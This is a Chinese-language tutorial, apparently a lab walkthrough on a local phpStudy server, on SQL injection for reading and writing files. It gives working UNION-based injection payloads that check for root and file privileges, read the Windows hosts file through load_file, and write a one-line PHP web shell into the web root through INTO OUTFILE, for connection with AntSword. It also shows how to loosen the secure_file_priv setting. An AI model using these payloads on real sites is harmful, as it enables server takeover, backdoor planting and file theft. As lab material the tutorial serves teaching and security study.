文章目录
条件
SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要
目的在于获取webshell或盗取重要文件。
- 当前(连接)数据库的用户具有文件读写权限。
- 已知读写目标文件的绝对路径。
web 应用在服务器上的绝对路径,一般情况下是不知道的。
但是系统敏感文件的路径是固定的。
- 安全选项secure_file_priv允许导入导出操作。
secure_file_priv=null,不允许导入导出操作。
secure_file_priv=目录名,只允许此目录及子目录下导入导出操作。
secure_file_priv= ,不对导入导出操作做限制。
利用SQL注入漏洞读取hosts文件
查看文件读写权限
输入语句逐个查看当前用户,查看到第三个用户发现他是root权限:
?id=1' and 1=2 union select 1,user(),3 --+
data:image/s3,"s3://crabby-images/747d3/747d3db69f8d2cf0b4559bb61faab5381e022759" alt=""
输入语句查看用户的权限
?id=1' and 1=2 union select 1,file_priv,3 from mysql.user where user='root' and host='localhost' --+
查看后用户具有文件读写权限:
data:image/s3,"s3://crabby-images/e43f5/e43f5202ce4fbc8c27fe5ba0d68062ea4c1e15a5" alt=""
安全选项允许导入导出
登录phpMyAdmin,点击变量,在搜索框中搜索priv,可以看到下面的变量,secure file priv的值为null:
data:image/s3,"s3://crabby-images/762a4/762a44385c1e3482cc615e6842aef23476e35dce" alt=""
然后在phpstudy中打开配置文件:
data:image/s3,"s3://crabby-images/3574f/3574f5f3069e82ee14bc9a495c8648a3d42f3e56" alt=""
在mysqld中加入secure_file_priv=,保存
data:image/s3,"s3://crabby-images/a592c/a592c97b0ed77c47e84d73f2c53952902bcfd67f" alt=""
重启phpstudy,并刷新phpMyAdmin页面,搜索后发现发现变量secure file priv的值已经为空,此时已修改成功:
data:image/s3,"s3://crabby-images/d3beb/d3beb8a1e7fa523bee3c24a23f7ada54178c9357" alt=""
读取hosts文件
已知hosts文件的绝对路径是c:\windows\system32\drivers\etc\hosts,输入下面的联合查询语句,对hosts文件进行读取(注意需要对路径中的\进行转义):
?id=1' and 1=2 union select 1,2,load_file("c:\\windows\\system32\\drivers\\etc\\hosts") --+
读取成功:
data:image/s3,"s3://crabby-images/ab637/ab637b25cd7a6e99d227f90bd7eb8a0b89a03e67" alt=""
利用SQL注入漏洞写入一句话木马,并用蚁剑连接webshell
写入文件
输入下面SQL语句,在www目录下写入一个muma.php文件
?id=1' and 1=2 union select 1,"<?php @eval($_REQUEST[777])?>",3 into outfile
"c:\\phpstudy\\WWW\\muma.php" --+
执行成功:
data:image/s3,"s3://crabby-images/a11e9/a11e936875e84de42b8d7ab3811263325c6ae36e" alt=""
写入的文件:
data:image/s3,"s3://crabby-images/72ed8/72ed8e3620692e6bc4050026dce9b4b5ca399279" alt=""